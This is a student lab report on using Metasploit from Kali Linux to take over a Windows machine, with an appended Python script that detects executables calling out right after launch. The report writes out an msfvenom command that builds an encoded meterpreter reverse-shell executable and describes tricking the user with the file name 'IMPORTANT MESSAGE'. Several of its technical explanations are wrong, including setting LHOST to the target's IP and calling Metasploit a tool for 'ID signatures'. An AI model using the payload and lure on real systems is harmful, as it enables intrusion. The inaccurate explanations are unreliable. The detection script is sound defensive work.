This article discusses the use of Metasploit to carry out penetration tests on Windows machines remotely. It provides a step-by-step guide on how to set up the experiment and execute the exploit. The article also highlights the importance of knowledge of common penetration tests in protecting an organization's data resources.
Running Head: ICT ETHICAL HACKING (EXPLOITS)

KALI LINUX EXPLOIT USING METASPLOIT

Student name
Institution Affiliation
Facilitator
Course
Date
Introduction

In this era where cybersecurity has emerged as a major concern for information systems, knowledge of some of the common penetration tests that attackers can use to compromise organization systems is of paramount importance. This is because it enables IT professionals to test and implement the necessary measures to protect the organization's data resources. In our workshop session on common exploitation approaches used by attackers, we experimented with Metasploit exploitation on the Kali Linux platform. The targeted machine, however, was supposed to be running a Windows operating system, regardless of the version (Windows XP, 7, 8, 8.1 and 10). The main aim of our experiment was to learn how attackers can penetrate machines running Windows remotely and without the consent of the main user of the machine (Dieterle, 2016).

Metasploit is a project which enables attackers to carry out penetration into the victim's machine through development of ID signatures. To achieve that, the tool enables attackers to come up with exploit code, which is then executed on targeted remote machines to let them get into the machine with full user rights (Holik, Horalek, Marik, Neradova & Zitta, 2014, p. 241).

To set up our penetration test experiment, we required the Metasploit framework with full Ruby packages installed on the Kali Linux machine, and two computers running different operating systems (one Kali Linux and the other Windows). The two machines were placed on the same NAT network in order to allow us to retrieve their IP addresses and port numbers easily. Also, since an antivirus on the targeted machine would hinder us from realizing our exploitation objective, we made sure that the Windows machine did not have any antivirus software running on it.

The penetration test consisted entirely of running commands on the Kali Linux machine, and the main Metasploit command we utilized was Msfconsole because of its flexibility and other favorable features supporting the Metasploit framework. To be able to gain access to the second machine, we needed to know the machine's IP address and any of its free port numbers. To acquire the two, we simply used Netcut software, considering the fact that the two machines were operating under the same NAT network (Muniz, 2013).

Getting down to the real business, we started by creating executable files whose unique identifiers were basically the IP address and the port number we had obtained from the targeted machine, using the Msfconsole command "msfvenom -p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT= (PORT in the windows machine) -f exe -e x86/shikata_ga_nai -i 10> /root/desktop/ (desktop name).exe". The next step was to make sure that the file was sent to the targeted machine and to trick the user into opening it. So we saved the folder as "IMPORTANT MESSAGE", to be sure that the user would definitely be tempted to open it. After sending the file, we activated our Metasploit framework to listen for the file using the Msfconsole command "exploit". In this state, the "meterpreter" would be activated on our Kali Linux machine automatically when the targeted user opened the sent file, and would give us access to his or her machine immediately.

So, after the file was opened on the second machine, we automatically gained access to the victim's machine with full control rights, just like a person logged into the machine physically. We could carry out several operations such as editing files, deleting files, viewing folders and removing some directories (Weidman, 2014). That was a clear indication that we had gotten into the machine remotely without the owner's consent.

References

Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing Platform.

Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration testing with Metasploit framework and methodologies. In Computational Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.

Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.

Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd.

Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.
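
From the defender's side, the behaviour the experiment relies on (a user-launched executable that immediately connects back out) can be hunted in endpoint telemetry. The following is an added example, not part of the original paper: it correlates Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records. The event records, host paths, IP addresses and port are constructed sample values, and the simplified dictionary field names are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the original paper). "id" mirrors the
# Sysmon event ID: 1 = process creation, 3 = network connection.
EVENTS = [
    {"id": 1, "time": "2024-01-10 09:00:01", "guid": "A1",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "time": "2024-01-10 09:00:03", "guid": "A1", "initiated": True,
     "dst_ip": "93.184.216.34", "dst_port": 443},
    {"id": 1, "time": "2024-01-10 09:05:10", "guid": "B2",
     "image": r"C:\Users\alice\Desktop\IMPORTANT MESSAGE.exe"},
    {"id": 3, "time": "2024-01-10 09:05:11", "guid": "B2", "initiated": True,
     "dst_ip": "10.0.2.15", "dst_port": 4444},
    {"id": 1, "time": "2024-01-10 09:07:00", "guid": "C3",
     "image": r"C:\Users\alice\Downloads\setup.exe"},
]

# Directories an unprivileged user can write to (assumed policy for this example).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")
WINDOW = timedelta(seconds=30)


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def find_suspect_callbacks(events, window=WINDOW):
    """Alert on processes started from user-writable paths that open an
    outbound connection within `window` of being launched."""
    started = {}  # process GUID -> (image path, start time)
    alerts = []
    for ev in sorted(events, key=lambda e: parse(e["time"])):
        if ev["id"] == 1:
            image = ev["image"]
            if any(p in image.lower() for p in USER_WRITABLE):
                started[ev["guid"]] = (image, parse(ev["time"]))
        elif ev["id"] == 3 and ev.get("initiated") and ev["guid"] in started:
            image, t0 = started[ev["guid"]]
            delay = parse(ev["time"]) - t0
            if delay <= window:
                alerts.append({"image": image,
                               "dst": f'{ev["dst_ip"]}:{ev["dst_port"]}',
                               "delay_s": int(delay.total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_suspect_callbacks(EVENTS):
        print(alert)
```

The browser in Program Files and the downloaded installer that never connects out are both ignored; only the desktop executable that calls out one second after launch is reported.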